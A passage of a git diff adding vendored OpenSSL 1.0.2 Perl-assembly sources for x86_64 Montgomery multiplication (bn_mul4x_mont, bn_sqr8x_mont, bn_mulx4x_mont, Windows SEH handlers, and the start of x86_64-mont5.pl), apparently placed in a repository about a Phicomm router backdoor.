+	lea	-1($num),$j
+	or	$np,$ap			# ap=borrow?tp:rp
+
+	movdqu	($ap),%xmm1
+	movdqa	%xmm0,(%rsp)
+	movdqu	%xmm1,($rp)
+	jmp	.Lcopy4x
+.align	16
+.Lcopy4x:					# copy or in-place refresh
+	movdqu	16($ap,$i),%xmm2
+	movdqu	32($ap,$i),%xmm1
+	movdqa	%xmm0,16(%rsp,$i)
+	movdqu	%xmm2,16($rp,$i)
+	movdqa	%xmm0,32(%rsp,$i)
+	movdqu	%xmm1,32($rp,$i)
+	lea	32($i),$i
+	dec	$j
+	jnz	.Lcopy4x
+
+	shl	\$2,$num
+	movdqu	16($ap,$i),%xmm2
+	movdqa	%xmm0,16(%rsp,$i)
+	movdqu	%xmm2,16($rp,$i)
+___
+}
+$code.=<<___;
+	mov	8(%rsp,$num,8),%rsi	# restore %rsp
+	mov	\$1,%rax
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lmul4x_epilogue:
+	ret
+.size	bn_mul4x_mont,.-bn_mul4x_mont
+___
+}}}
+{{{
+######################################################################
+# void bn_sqr8x_mont(
+my $rptr="%rdi";	# const BN_ULONG *rptr,
+my $aptr="%rsi";	# const BN_ULONG *aptr,
+my $bptr="%rdx";	# not used
+my $nptr="%rcx";	# const BN_ULONG *nptr,
+my $n0  ="%r8";		# const BN_ULONG *n0);
+my $num ="%r9";		# int num, has to be divisible by 8
+
+my ($i,$j,$tptr)=("%rbp","%rcx",$rptr);
+my @A0=("%r10","%r11");
+my @A1=("%r12","%r13");
+my ($a0,$a1,$ai)=("%r14","%r15","%rbx");
+
+$code.=<<___	if ($addx);
+.extern	bn_sqrx8x_internal		# see x86_64-mont5 module
+___
+$code.=<<___;
+.extern	bn_sqr8x_internal		# see x86_64-mont5 module
+
+.type	bn_sqr8x_mont,\@function,6
+.align	32
+bn_sqr8x_mont:
+.Lsqr8x_enter:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	mov	${num}d,%r10d
+	shl	\$3,${num}d		# convert $num to bytes
+	shl	\$3+2,%r10		# 4*$num
+	neg	$num
+
+	##############################################################
+	# ensure that stack frame doesn't alias with $aptr modulo
+	# 4096. this is done to allow memory disambiguation logic
+	# do its job.
+	#
+	lea	-64(%rsp,$num,4),%r11
+	mov	($n0),$n0		# *n0
+	sub	$aptr,%r11
+	and	\$4095,%r11
+	cmp	%r11,%r10
+	jb	.Lsqr8x_sp_alt
+	sub	%r11,%rsp		# align with $aptr
+	lea	-64(%rsp,$num,4),%rsp	# alloca(frame+4*$num)
+	jmp	.Lsqr8x_sp_done
+
+.align	32
+.Lsqr8x_sp_alt:
+	lea	4096-64(,$num,4),%r10	# 4096-frame-4*$num
+	lea	-64(%rsp,$num,4),%rsp	# alloca(frame+4*$num)
+	sub	%r10,%r11
+	mov	\$0,%r10
+	cmovc	%r10,%r11
+	sub	%r11,%rsp
+.Lsqr8x_sp_done:
+	and	\$-64,%rsp
+	mov	$num,%r10	
+	neg	$num
+
+	lea	64(%rsp,$num,2),%r11	# copy of modulus
+	mov	$n0,  32(%rsp)
+	mov	%rax, 40(%rsp)		# save original %rsp
+.Lsqr8x_body:
+
+	mov	$num,$i
+	movq	%r11, %xmm2		# save pointer to modulus copy
+	shr	\$3+2,$i
+	mov	OPENSSL_ia32cap_P+8(%rip),%eax
+	jmp	.Lsqr8x_copy_n
+
+.align	32
+.Lsqr8x_copy_n:
+	movq	8*0($nptr),%xmm0
+	movq	8*1($nptr),%xmm1
+	movq	8*2($nptr),%xmm3
+	movq	8*3($nptr),%xmm4
+	lea	8*4($nptr),$nptr
+	movdqa	%xmm0,16*0(%r11)
+	movdqa	%xmm1,16*1(%r11)
+	movdqa	%xmm3,16*2(%r11)
+	movdqa	%xmm4,16*3(%r11)
+	lea	16*4(%r11),%r11
+	dec	$i
+	jnz	.Lsqr8x_copy_n
+
+	pxor	%xmm0,%xmm0
+	movq	$rptr,%xmm1		# save $rptr
+	movq	%r10, %xmm3		# -$num
+___
+$code.=<<___ if ($addx);
+	and	\$0x80100,%eax
+	cmp	\$0x80100,%eax
+	jne	.Lsqr8x_nox
+
+	call	bn_sqrx8x_internal	# see x86_64-mont5 module
+
+	pxor	%xmm0,%xmm0
+	lea	48(%rsp),%rax
+	lea	64(%rsp,$num,2),%rdx
+	shr	\$3+2,$num
+	mov	40(%rsp),%rsi		# restore %rsp
+	jmp	.Lsqr8x_zero
+
+.align	32
+.Lsqr8x_nox:
+___
+$code.=<<___;
+	call	bn_sqr8x_internal	# see x86_64-mont5 module
+
+	pxor	%xmm0,%xmm0
+	lea	48(%rsp),%rax
+	lea	64(%rsp,$num,2),%rdx
+	shr	\$3+2,$num
+	mov	40(%rsp),%rsi		# restore %rsp
+	jmp	.Lsqr8x_zero
+
+.align	32
+.Lsqr8x_zero:
+	movdqa	%xmm0,16*0(%rax)	# wipe t
+	movdqa	%xmm0,16*1(%rax)
+	movdqa	%xmm0,16*2(%rax)
+	movdqa	%xmm0,16*3(%rax)
+	lea	16*4(%rax),%rax
+	movdqa	%xmm0,16*0(%rdx)	# wipe n
+	movdqa	%xmm0,16*1(%rdx)
+	movdqa	%xmm0,16*2(%rdx)
+	movdqa	%xmm0,16*3(%rdx)
+	lea	16*4(%rdx),%rdx
+	dec	$num
+	jnz	.Lsqr8x_zero
+
+	mov	\$1,%rax
+	mov	-48(%rsi),%r15
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lsqr8x_epilogue:
+	ret
+.size	bn_sqr8x_mont,.-bn_sqr8x_mont
+___
+}}}
+
+if ($addx) {{{
+my $bp="%rdx";	# original value
+
+$code.=<<___;
+.type	bn_mulx4x_mont,\@function,6
+.align	32
+bn_mulx4x_mont:
+.Lmulx4x_enter:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	shl	\$3,${num}d		# convert $num to bytes
+	.byte	0x67
+	xor	%r10,%r10
+	sub	$num,%r10		# -$num
+	mov	($n0),$n0		# *n0
+	lea	-72(%rsp,%r10),%rsp	# alloca(frame+$num+8)
+	lea	($bp,$num),%r10
+	and	\$-128,%rsp
+	##############################################################
+	# Stack layout
+	# +0	num
+	# +8	off-loaded &b[i]
+	# +16	end of b[num]
+	# +24	saved n0
+	# +32	saved rp
+	# +40	saved %rsp
+	# +48	inner counter
+	# +56
+	# +64	tmp[num+1]
+	#
+	mov	$num,0(%rsp)		# save $num
+	shr	\$5,$num
+	mov	%r10,16(%rsp)		# end of b[num]
+	sub	\$1,$num
+	mov	$n0, 24(%rsp)		# save *n0
+	mov	$rp, 32(%rsp)		# save $rp
+	mov	%rax,40(%rsp)		# save original %rsp
+	mov	$num,48(%rsp)		# inner counter
+	jmp	.Lmulx4x_body
+
+.align	32
+.Lmulx4x_body:
+___
+my ($aptr, $bptr, $nptr, $tptr, $mi,  $bi,  $zero, $num)=
+   ("%rsi","%rdi","%rcx","%rbx","%r8","%r9","%rbp","%rax");
+my $rptr=$bptr;
+$code.=<<___;
+	lea	8($bp),$bptr
+	mov	($bp),%rdx		# b[0], $bp==%rdx actually
+	lea	64+32(%rsp),$tptr
+	mov	%rdx,$bi
+
+	mulx	0*8($aptr),$mi,%rax	# a[0]*b[0]
+	mulx	1*8($aptr),%r11,%r14	# a[1]*b[0]
+	add	%rax,%r11
+	mov	$bptr,8(%rsp)		# off-load &b[i]
+	mulx	2*8($aptr),%r12,%r13	# ...
+	adc	%r14,%r12
+	adc	\$0,%r13
+
+	mov	$mi,$bptr		# borrow $bptr
+	imulq	24(%rsp),$mi		# "t[0]"*n0
+	xor	$zero,$zero		# cf=0, of=0
+
+	mulx	3*8($aptr),%rax,%r14
+	 mov	$mi,%rdx
+	lea	4*8($aptr),$aptr
+	adcx	%rax,%r13
+	adcx	$zero,%r14		# cf=0
+
+	mulx	0*8($nptr),%rax,%r10
+	adcx	%rax,$bptr		# discarded
+	adox	%r11,%r10
+	mulx	1*8($nptr),%rax,%r11
+	adcx	%rax,%r10
+	adox	%r12,%r11
+	.byte	0xc4,0x62,0xfb,0xf6,0xa1,0x10,0x00,0x00,0x00	# mulx	2*8($nptr),%rax,%r12
+	mov	48(%rsp),$bptr		# counter value
+	mov	%r10,-4*8($tptr)
+	adcx	%rax,%r11
+	adox	%r13,%r12
+	mulx	3*8($nptr),%rax,%r15
+	 mov	$bi,%rdx
+	mov	%r11,-3*8($tptr)
+	adcx	%rax,%r12
+	adox	$zero,%r15		# of=0
+	lea	4*8($nptr),$nptr
+	mov	%r12,-2*8($tptr)
+
+	jmp	.Lmulx4x_1st
+
+.align	32
+.Lmulx4x_1st:
+	adcx	$zero,%r15		# cf=0, modulo-scheduled
+	mulx	0*8($aptr),%r10,%rax	# a[4]*b[0]
+	adcx	%r14,%r10
+	mulx	1*8($aptr),%r11,%r14	# a[5]*b[0]
+	adcx	%rax,%r11
+	mulx	2*8($aptr),%r12,%rax	# ...
+	adcx	%r14,%r12
+	mulx	3*8($aptr),%r13,%r14
+	 .byte	0x67,0x67
+	 mov	$mi,%rdx
+	adcx	%rax,%r13
+	adcx	$zero,%r14		# cf=0
+	lea	4*8($aptr),$aptr
+	lea	4*8($tptr),$tptr
+
+	adox	%r15,%r10
+	mulx	0*8($nptr),%rax,%r15
+	adcx	%rax,%r10
+	adox	%r15,%r11
+	mulx	1*8($nptr),%rax,%r15
+	adcx	%rax,%r11
+	adox	%r15,%r12
+	mulx	2*8($nptr),%rax,%r15
+	mov	%r10,-5*8($tptr)
+	adcx	%rax,%r12
+	mov	%r11,-4*8($tptr)
+	adox	%r15,%r13
+	mulx	3*8($nptr),%rax,%r15
+	 mov	$bi,%rdx
+	mov	%r12,-3*8($tptr)
+	adcx	%rax,%r13
+	adox	$zero,%r15
+	lea	4*8($nptr),$nptr
+	mov	%r13,-2*8($tptr)
+
+	dec	$bptr			# of=0, pass cf
+	jnz	.Lmulx4x_1st
+
+	mov	0(%rsp),$num		# load num
+	mov	8(%rsp),$bptr		# re-load &b[i]
+	adc	$zero,%r15		# modulo-scheduled
+	add	%r15,%r14
+	sbb	%r15,%r15		# top-most carry
+	mov	%r14,-1*8($tptr)
+	jmp	.Lmulx4x_outer
+
+.align	32
+.Lmulx4x_outer:
+	mov	($bptr),%rdx		# b[i]
+	lea	8($bptr),$bptr		# b++
+	sub	$num,$aptr		# rewind $aptr
+	mov	%r15,($tptr)		# save top-most carry
+	lea	64+4*8(%rsp),$tptr
+	sub	$num,$nptr		# rewind $nptr
+
+	mulx	0*8($aptr),$mi,%r11	# a[0]*b[i]
+	xor	%ebp,%ebp		# xor	$zero,$zero	# cf=0, of=0
+	mov	%rdx,$bi
+	mulx	1*8($aptr),%r14,%r12	# a[1]*b[i]
+	adox	-4*8($tptr),$mi
+	adcx	%r14,%r11
+	mulx	2*8($aptr),%r15,%r13	# ...
+	adox	-3*8($tptr),%r11
+	adcx	%r15,%r12
+	adox	$zero,%r12
+	adcx	$zero,%r13
+
+	mov	$bptr,8(%rsp)		# off-load &b[i]
+	.byte	0x67
+	mov	$mi,%r15
+	imulq	24(%rsp),$mi		# "t[0]"*n0
+	xor	%ebp,%ebp		# xor	$zero,$zero	# cf=0, of=0
+
+	mulx	3*8($aptr),%rax,%r14
+	 mov	$mi,%rdx
+	adox	-2*8($tptr),%r12
+	adcx	%rax,%r13
+	adox	-1*8($tptr),%r13
+	adcx	$zero,%r14
+	lea	4*8($aptr),$aptr
+	adox	$zero,%r14
+
+	mulx	0*8($nptr),%rax,%r10
+	adcx	%rax,%r15		# discarded
+	adox	%r11,%r10
+	mulx	1*8($nptr),%rax,%r11
+	adcx	%rax,%r10
+	adox	%r12,%r11
+	mulx	2*8($nptr),%rax,%r12
+	mov	%r10,-4*8($tptr)
+	adcx	%rax,%r11
+	adox	%r13,%r12
+	mulx	3*8($nptr),%rax,%r15
+	 mov	$bi,%rdx
+	mov	%r11,-3*8($tptr)
+	lea	4*8($nptr),$nptr
+	adcx	%rax,%r12
+	adox	$zero,%r15		# of=0
+	mov	48(%rsp),$bptr		# counter value
+	mov	%r12,-2*8($tptr)
+
+	jmp	.Lmulx4x_inner
+
+.align	32
+.Lmulx4x_inner:
+	mulx	0*8($aptr),%r10,%rax	# a[4]*b[i]
+	adcx	$zero,%r15		# cf=0, modulo-scheduled
+	adox	%r14,%r10
+	mulx	1*8($aptr),%r11,%r14	# a[5]*b[i]
+	adcx	0*8($tptr),%r10
+	adox	%rax,%r11
+	mulx	2*8($aptr),%r12,%rax	# ...
+	adcx	1*8($tptr),%r11
+	adox	%r14,%r12
+	mulx	3*8($aptr),%r13,%r14
+	 mov	$mi,%rdx
+	adcx	2*8($tptr),%r12
+	adox	%rax,%r13
+	adcx	3*8($tptr),%r13
+	adox	$zero,%r14		# of=0
+	lea	4*8($aptr),$aptr
+	lea	4*8($tptr),$tptr
+	adcx	$zero,%r14		# cf=0
+
+	adox	%r15,%r10
+	mulx	0*8($nptr),%rax,%r15
+	adcx	%rax,%r10
+	adox	%r15,%r11
+	mulx	1*8($nptr),%rax,%r15
+	adcx	%rax,%r11
+	adox	%r15,%r12
+	mulx	2*8($nptr),%rax,%r15
+	mov	%r10,-5*8($tptr)
+	adcx	%rax,%r12
+	adox	%r15,%r13
+	mulx	3*8($nptr),%rax,%r15
+	 mov	$bi,%rdx
+	mov	%r11,-4*8($tptr)
+	mov	%r12,-3*8($tptr)
+	adcx	%rax,%r13
+	adox	$zero,%r15
+	lea	4*8($nptr),$nptr
+	mov	%r13,-2*8($tptr)
+
+	dec	$bptr			# of=0, pass cf
+	jnz	.Lmulx4x_inner
+
+	mov	0(%rsp),$num		# load num
+	mov	8(%rsp),$bptr		# re-load &b[i]
+	adc	$zero,%r15		# modulo-scheduled
+	sub	0*8($tptr),$zero	# pull top-most carry
+	adc	%r15,%r14
+	mov	-8($nptr),$mi
+	sbb	%r15,%r15		# top-most carry
+	mov	%r14,-1*8($tptr)
+
+	cmp	16(%rsp),$bptr
+	jne	.Lmulx4x_outer
+
+	sub	%r14,$mi		# compare top-most words
+	sbb	$mi,$mi
+	or	$mi,%r15
+
+	neg	$num
+	xor	%rdx,%rdx
+	mov	32(%rsp),$rptr		# restore rp
+	lea	64(%rsp),$tptr
+
+	pxor	%xmm0,%xmm0
+	mov	0*8($nptr,$num),%r8
+	mov	1*8($nptr,$num),%r9
+	neg	%r8
+	jmp	.Lmulx4x_sub_entry
+
+.align	32
+.Lmulx4x_sub:
+	mov	0*8($nptr,$num),%r8
+	mov	1*8($nptr,$num),%r9
+	not	%r8
+.Lmulx4x_sub_entry:
+	mov	2*8($nptr,$num),%r10
+	not	%r9
+	and	%r15,%r8
+	mov	3*8($nptr,$num),%r11
+	not	%r10
+	and	%r15,%r9
+	not	%r11
+	and	%r15,%r10
+	and	%r15,%r11
+
+	neg	%rdx			# mov %rdx,%cf
+	adc	0*8($tptr),%r8
+	adc	1*8($tptr),%r9
+	movdqa	%xmm0,($tptr)
+	adc	2*8($tptr),%r10
+	adc	3*8($tptr),%r11
+	movdqa	%xmm0,16($tptr)
+	lea	4*8($tptr),$tptr
+	sbb	%rdx,%rdx		# mov %cf,%rdx
+
+	mov	%r8,0*8($rptr)
+	mov	%r9,1*8($rptr)
+	mov	%r10,2*8($rptr)
+	mov	%r11,3*8($rptr)
+	lea	4*8($rptr),$rptr
+
+	add	\$32,$num
+	jnz	.Lmulx4x_sub
+
+	mov	40(%rsp),%rsi		# restore %rsp
+	mov	\$1,%rax
+	mov	-48(%rsi),%r15
+	mov	-40(%rsi),%r14
+	mov	-32(%rsi),%r13
+	mov	-24(%rsi),%r12
+	mov	-16(%rsi),%rbp
+	mov	-8(%rsi),%rbx
+	lea	(%rsi),%rsp
+.Lmulx4x_epilogue:
+	ret
+.size	bn_mulx4x_mont,.-bn_mulx4x_mont
+___
+}}}
+$code.=<<___;
+.asciz	"Montgomery Multiplication for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+.align	16
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	mul_handler,\@abi-omnipotent
+.align	16
+mul_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# end of prologue label
+	cmp	%r10,%rbx		# context->Rip<end of prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+
+	mov	192($context),%r10	# pull $num
+	mov	8(%rax,%r10,8),%rax	# pull saved stack pointer
+	lea	48(%rax),%rax
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+	jmp	.Lcommon_seh_tail
+.size	mul_handler,.-mul_handler
+
+.type	sqr_handler,\@abi-omnipotent
+.align	16
+sqr_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# end of prologue label
+	cmp	%r10,%rbx		# context->Rip<.Lsqr_body
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=.Lsqr_epilogue
+	jae	.Lcommon_seh_tail
+
+	mov	40(%rax),%rax		# pull saved stack pointer
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lcommon_seh_tail:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	sqr_handler,.-sqr_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_bn_mul_mont
+	.rva	.LSEH_end_bn_mul_mont
+	.rva	.LSEH_info_bn_mul_mont
+
+	.rva	.LSEH_begin_bn_mul4x_mont
+	.rva	.LSEH_end_bn_mul4x_mont
+	.rva	.LSEH_info_bn_mul4x_mont
+
+	.rva	.LSEH_begin_bn_sqr8x_mont
+	.rva	.LSEH_end_bn_sqr8x_mont
+	.rva	.LSEH_info_bn_sqr8x_mont
+___
+$code.=<<___ if ($addx);
+	.rva	.LSEH_begin_bn_mulx4x_mont
+	.rva	.LSEH_end_bn_mulx4x_mont
+	.rva	.LSEH_info_bn_mulx4x_mont
+___
+$code.=<<___;
+.section	.xdata
+.align	8
+.LSEH_info_bn_mul_mont:
+	.byte	9,0,0,0
+	.rva	mul_handler
+	.rva	.Lmul_body,.Lmul_epilogue	# HandlerData[]
+.LSEH_info_bn_mul4x_mont:
+	.byte	9,0,0,0
+	.rva	mul_handler
+	.rva	.Lmul4x_body,.Lmul4x_epilogue	# HandlerData[]
+.LSEH_info_bn_sqr8x_mont:
+	.byte	9,0,0,0
+	.rva	sqr_handler
+	.rva	.Lsqr8x_body,.Lsqr8x_epilogue	# HandlerData[]
+___
+$code.=<<___ if ($addx);
+.LSEH_info_bn_mulx4x_mont:
+	.byte	9,0,0,0
+	.rva	sqr_handler
+	.rva	.Lmulx4x_body,.Lmulx4x_epilogue	# HandlerData[]
+___
+}
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-mont5.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-mont5.pl
new file mode 100755
index 0000000..fa22c30
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/x86_64-mont5.pl
@@ -0,0 +1,3514 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# August 2011.
+#
+# Companion to x86_64-mont.pl that optimizes cache-timing attack
+# countermeasures. The subroutines are produced by replacing bp[i]
+# references in their x86_64-mont.pl counterparts with cache-neutral
+# references to powers table computed in BN_mod_exp_mont_consttime.
+# In addition subroutine that scatters elements of the powers table
+# is implemented, so that scatter-/gathering can be tuned without
+# bn_exp.c modifications.
+
+# August 2013.
+#
+# Add MULX/AD*X code paths and additional interfaces to optimize for
+# branch prediction unit. For input lengths that are multiples of 8
+# the np argument is not just modulus value, but one interleaved
+# with 0. This is to optimize post-condition...
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$addx = ($1>=2.23);
+}
+
+if (!$addx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	    `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$addx = ($1>=2.10);
+}
+
+if (!$addx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	    `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$addx = ($1>=12);
+}
+
+# int bn_mul_mont_gather5(
+$rp="%rdi";	# BN_ULONG *rp,
+$ap="%rsi";	# const BN_ULONG *ap,
+$bp="%rdx";	# const BN_ULONG *bp,
+$np="%rcx";	# const BN_ULONG *np,
+$n0="%r8";	# const BN_ULONG *n0,
+$num="%r9";	# int num,
+		# int idx);	# 0 to 2^5-1, "index" in $bp holding
+				# pre-computed powers of a', interlaced
+				# in such manner that b[0] is $bp[idx],
+				# b[1] is [2^5+idx], etc.
+$lo0="%r10";
+$hi0="%r11";
+$hi1="%r13";
+$i="%r14";
+$j="%r15";
+$m0="%rbx";
+$m1="%rbp";
+
+$code=<<___;
+.text
+
+.extern	OPENSSL_ia32cap_P
+
+.globl	bn_mul_mont_gather5
+.type	bn_mul_mont_gather5,\@function,6
+.align	64
+bn_mul_mont_gather5:
+	test	\$7,${num}d
+	jnz	.Lmul_enter
+___
+$code.=<<___ if ($addx);
+	mov	OPENSSL_ia32cap_P+8(%rip),%r11d
+___
+$code.=<<___;
+	jmp	.Lmul4x_enter
+
+.align	16
+.Lmul_enter:
+	mov	${num}d,${num}d
+	mov	%rsp,%rax
+	mov	`($win64?56:8)`(%rsp),%r10d	# load 7th argument
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0x28(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+___
+$code.=<<___;
+	lea	2($num),%r11
+	neg	%r11
+	lea	(%rsp,%r11,8),%rsp	# tp=alloca(8*(num+2))
+	and	\$-1024,%rsp		# minimize TLB usage
+
+	mov	%rax,8(%rsp,$num,8)	# tp[num+1]=%rsp
+.Lmul_body:
+	mov	$bp,%r12		# reassign $bp
+___
+		$bp="%r12";
+		$STRIDE=2**5*8;		# 5 is "window size"
+		$N=$STRIDE/4;		# should match cache line size
+$code.=<<___;
+	mov	%r10,%r11
+	shr	\$`log($N/8)/log(2)`,%r10
+	and	\$`$N/8-1`,%r11
+	not	%r10
+	lea	.Lmagic_masks(%rip),%rax
+	and	\$`2**5/($N/8)-1`,%r10	# 5 is "window size"
+	lea	96($bp,%r11,8),$bp	# pointer within 1st cache line
+	movq	0(%rax,%r10,8),%xmm4	# set of masks denoting which
+	movq	8(%rax,%r10,8),%xmm5	# cache line contains element
+	movq	16(%rax,%r10,8),%xmm6	# denoted by 7th argument
+	movq	24(%rax,%r10,8),%xmm7
+
+	movq	`0*$STRIDE/4-96`($bp),%xmm0
+	movq	`1*$STRIDE/4-96`($bp),%xmm1
+	pand	%xmm4,%xmm0
+	movq	`2*$STRIDE/4-96`($bp),%xmm2
+	pand	%xmm5,%xmm1
+	movq	`3*$STRIDE/4-96`($bp),%xmm3
+	pand	%xmm6,%xmm2
+	por	%xmm1,%xmm0
+	pand	%xmm7,%xmm3
+	por	%xmm2,%xmm0
+	lea	$STRIDE($bp),$bp
+	por	%xmm3,%xmm0
+
+	movq	%xmm0,$m0		# m0=bp[0]
+
+	mov	($n0),$n0		# pull n0[0] value
+	mov	($ap),%rax
+
+	xor	$i,$i			# i=0
+	xor	$j,$j			# j=0
+
+	movq	`0*$STRIDE/4-96`($bp),%xmm0
+	movq	`1*$STRIDE/4-96`($bp),%xmm1
+	pand	%xmm4,%xmm0
+	movq	`2*$STRIDE/4-96`($bp),%xmm2
+	pand	%xmm5,%xmm1
+
+	mov	$n0,$m1
+	mulq	$m0			# ap[0]*bp[0]
+	mov	%rax,$lo0
+	mov	($np),%rax
+
+	movq	`3*$STRIDE/4-96`($bp),%xmm3
+	pand	%xmm6,%xmm2
+	por	%xmm1,%xmm0
+	pand	%xmm7,%xmm3
+
+	imulq	$lo0,$m1		# "tp[0]"*n0
+	mov	%rdx,$hi0
+
+	por	%xmm2,%xmm0
+	lea	$STRIDE($bp),$bp
+	por	%xmm3,%xmm0
+
+	mulq	$m1			# np[0]*m1
+	add	%rax,$lo0		# discarded
+	mov	8($ap),%rax
+	adc	\$0,%rdx
+	mov	%rdx,$hi1
+
+	lea	1($j),$j		# j++
+	jmp	.L1st_enter
+
+.align	16
+.L1st:
+	add	%rax,$hi1
+	mov	($ap,$j,8),%rax
+	adc	\$0,%rdx
+	add	$hi0,$hi1		# np[j]*m1+ap[j]*bp[0]
+	mov	$lo0,$hi0
+	adc	\$0,%rdx
+	mov	$hi1,-16(%rsp,$j,8)	# tp[j-1]
+	mov	%rdx,$hi1
+
+.L1st_enter:
+	mulq	$m0			# ap[j]*bp[0]
+	add	%rax,$hi0
+	mov	($np,$j,8),%rax
+	adc	\$0,%rdx
